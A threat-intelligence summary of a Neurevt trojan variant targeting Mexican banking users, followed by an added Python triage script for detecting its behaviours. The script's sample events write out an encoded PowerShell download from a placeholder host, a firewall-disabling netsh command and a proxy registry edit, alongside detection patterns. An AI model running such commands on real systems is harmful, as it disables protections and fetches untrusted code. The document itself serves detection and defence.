Neurevt Trojan Takes Aim at Mexican Users


  • Cisco Talos discovered a new version of the Neurevt trojan with spyware and backdoor capabilities in June 2021 using Cisco Secure Endpoint product telemetry.
  • This version of Neurevt appears to target users of Mexican financial institutions.
  • This threat demonstrates several techniques of the MITRE ATT&CK framework, most notably T1547 - Boot or Login Autostart Execution, T1055 - Process Injection, T1546 - Event-Triggered Execution, T1056 - Credential API Hooking, T1553 - Subvert Trust Controls, T1562 - Impair Defences, T1112 - Modify Registry, T1497 - Virtualization/Sandbox Evasion, T1083 - File and Directory Discovery, T1120 - Peripheral Device Discovery, T1057 - Process Discovery, T1012 - Query Registry, T1518 - Software Discovery and T1082 - System Information Discovery.

What's new?

Although Neurevt has been around for a while, recent samples in Cisco Secure Endpoint show that the actors combined this trojan with backdoors and information stealers. This trojan appears to target Mexican organizations. Talos is tracking these campaigns, whose associated droppers embed URLs that belong to many major banks in Mexico.

How did it work?

The malware starts with an obfuscated PowerShell command that downloads an executable file belonging to the Neurevt family. The trojan drops other executables, scripts and files into folders that it creates at runtime. The dropped payload ends up in a benign location of the filesystem and runs, elevating its privileges by stealing service token information. It then executes the following stages of the dropped executable file, which installs hook procedures to monitor keystrokes and mouse input events. It captures the monitor screen and clipboard information. Then, Neurevt detects virtualized and debugger environments, disables the firewall, and modifies the internet proxy settings on the victim's machine to evade detection and thwart analysis. Instead of calling known APIs for HTTP communication, the malware uses the System.Web namespace and includes HTTP classes to enable browser-server communication with the command and control (C2) server to exfiltrate the data.

So what?

Online banking users in Mexico should be cautious while operating their computers and accessing emails and attachments, and should refrain from accessing unsecured websites. This trojan mostly steals the usernames and passwords of users on the sites and may also target other intellectual information. Organizations and individuals should keep their systems updated with the latest security patches for their operating systems and applications, and enable multi-factor authentication on their accounts if possible.
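
An added example, not from the Talos report: generic triage of process-creation command lines for three behaviours described under "How did it work?" (an obfuscated PowerShell download, a disabled firewall, and changed internet proxy settings). The command-line patterns, function names and sample events are assumptions for illustration, not Neurevt indicators.

```python
import base64
import re

# Generic behavioural heuristics (assumed command lines, not Neurevt indicators).
RULES = [
    ("T1562 firewall disabled", re.compile(
        r"netsh(?:\.exe)?\s+(?:advfirewall\s+set\s+\w+\s+state\s+off"
        r"|firewall\s+set\s+opmode\s+(?:mode=)?disable)", re.I)),
    ("T1112 proxy settings modified", re.compile(
        r"Internet Settings.*\b(?:ProxyEnable|ProxyServer|AutoConfigURL)\b", re.I)),
    ("PowerShell download", re.compile(
        r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I)),
]
# -EncodedCommand may be abbreviated (-e, -enc, ...); require a long base64 argument.
ENC_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    match = ENC_FLAG.search(cmdline)
    if match is None or "powershell" not in cmdline.lower():
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or bad UTF-16 (both are ValueError subclasses)
        return None


def triage(cmdline):
    """Return the behaviours matched by one process-creation command line."""
    hidden = decode_encoded_command(cmdline)
    # Match the rules against the decoded script too, so encoding does not hide it.
    text = cmdline if hidden is None else f"{cmdline} {hidden}"
    hits = [name for name, rule in RULES if rule.search(text)]
    if hidden is not None:
        hits.insert(0, "Encoded PowerShell")
    return hits


# Constructed sample events; example.invalid is a reserved, non-resolving name.
SAMPLE_SCRIPT = "Invoke-WebRequest http://example.invalid/a.bin -OutFile a.bin"
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -WindowStyle Hidden -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode(),
    "netsh advfirewall set allprofiles state off",
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"'
    r" /v ProxyEnable /t REG_DWORD /d 1 /f",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event) or ["no match"], "<-", event[:60])
```

Matches are triage leads only: administrators run the same firewall and proxy commands legitimately, so correlate hits with the parent process and user before escalating.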